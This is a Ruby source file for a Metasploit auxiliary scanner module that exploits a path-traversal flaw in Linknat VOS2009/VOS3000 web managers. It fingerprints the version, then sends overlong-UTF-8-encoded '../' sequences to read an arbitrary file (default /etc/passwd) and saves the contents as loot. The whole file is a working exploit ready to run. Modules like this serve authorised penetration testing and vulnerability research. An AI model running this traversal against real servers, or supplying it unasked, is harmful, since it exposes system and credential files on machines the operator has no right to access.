94 lines
2.6 KiB
Ruby
94 lines
2.6 KiB
Ruby
|
##
|
||
|
# This module requires Metasploit: http://metasploit.com/download
|
||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||
|
##
|
||
|
|
||
|
require 'msf/core'
|
||
|
|
||
|
class Metasploit3 < Msf::Auxiliary
|
||
|
|
||
|
include Msf::Auxiliary::Report
|
||
|
include Msf::Exploit::Remote::HttpClient
|
||
|
include Msf::Auxiliary::Scanner
|
||
|
|
||
|
def initialize(info = {})
|
||
|
super(update_info(info,
|
||
|
'Name' => 'Linknat Vos Manager Traversal',
|
||
|
'Description' => %q(
|
||
|
This module attempts to test whether a file traversal vulnerability
|
||
|
is present in version of linknat vos2009/vos3000
|
||
|
),
|
||
|
'References' => [
|
||
|
['URL', 'http://www.linknat.com/'],
|
||
|
['URL', 'http://www.wooyun.org/bugs/wooyun-2010-0145458']
|
||
|
],
|
||
|
'Author' => ['Nixawk'],
|
||
|
'License' => MSF_LICENSE))
|
||
|
|
||
|
register_options(
|
||
|
[
|
||
|
Opt::RPORT(80),
|
||
|
OptString.new('TARGETURI', [true, 'The path of Linknat Vos Manager (/chs/, /cht/, /eng/)', '/eng/']),
|
||
|
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
|
||
|
OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 5])
|
||
|
], self.class)
|
||
|
end
|
||
|
|
||
|
def vos_uri(path)
|
||
|
full_uri =~ %r{/$} ? "#{full_uri}#{path}" : "#{full_uri}/#{path}"
|
||
|
end
|
||
|
|
||
|
def vos_version
|
||
|
case target_uri.to_s
|
||
|
when /chs/i
|
||
|
js_uri = vos_uri('js/lang_zh_cn.js')
|
||
|
when /cht/i
|
||
|
js_uri = vos_uri('js/lang_zh_tw.js')
|
||
|
when /eng/i
|
||
|
js_uri = vos_uri('js/lang_en_us.js')
|
||
|
else
|
||
|
print_warning("#{full_uri} - Please identify VOS version manually")
|
||
|
return
|
||
|
end
|
||
|
|
||
|
res = send_request_cgi('uri' => js_uri)
|
||
|
return unless res
|
||
|
|
||
|
vprint_status("#{js_uri} - HTTP/#{res.proto} #{res.code} #{res.message}")
|
||
|
|
||
|
return unless res.code == 200
|
||
|
res.body =~ /s\[8\] = \"([^"]*)\"/m ? major = $1 : major = nil
|
||
|
res.body =~ /s\[169\] = \"[^:]*: ([^"\\]*)\"/m ? minor = $1 : minor = nil
|
||
|
"#{major} #{minor}"
|
||
|
end
|
||
|
|
||
|
def run_host(ip)
|
||
|
version = vos_version
|
||
|
unless version
|
||
|
print_error("#{full_uri} - Failed to identify Linknat VOS")
|
||
|
return
|
||
|
end
|
||
|
|
||
|
traversal = '/%c0%ae%c0%ae' * datastore['TRAVERSAL_DEPTH']
|
||
|
filename = datastore['FILEPATH']
|
||
|
|
||
|
uri = normalize_uri(target_uri.path, '..', traversal, filename)
|
||
|
res = send_request_cgi(
|
||
|
'method' => 'GET',
|
||
|
'uri' => uri
|
||
|
)
|
||
|
|
||
|
if res && res.code == 200
|
||
|
path = store_loot(
|
||
|
version,
|
||
|
'text/plain',
|
||
|
ip,
|
||
|
res.body,
|
||
|
filename)
|
||
|
print_good("#{full_uri} - File saved in: #{path}")
|
||
|
else
|
||
|
print_error("#{full_uri} - Nothing was downloaded")
|
||
|
end
|
||
|
end
|
||
|
end
|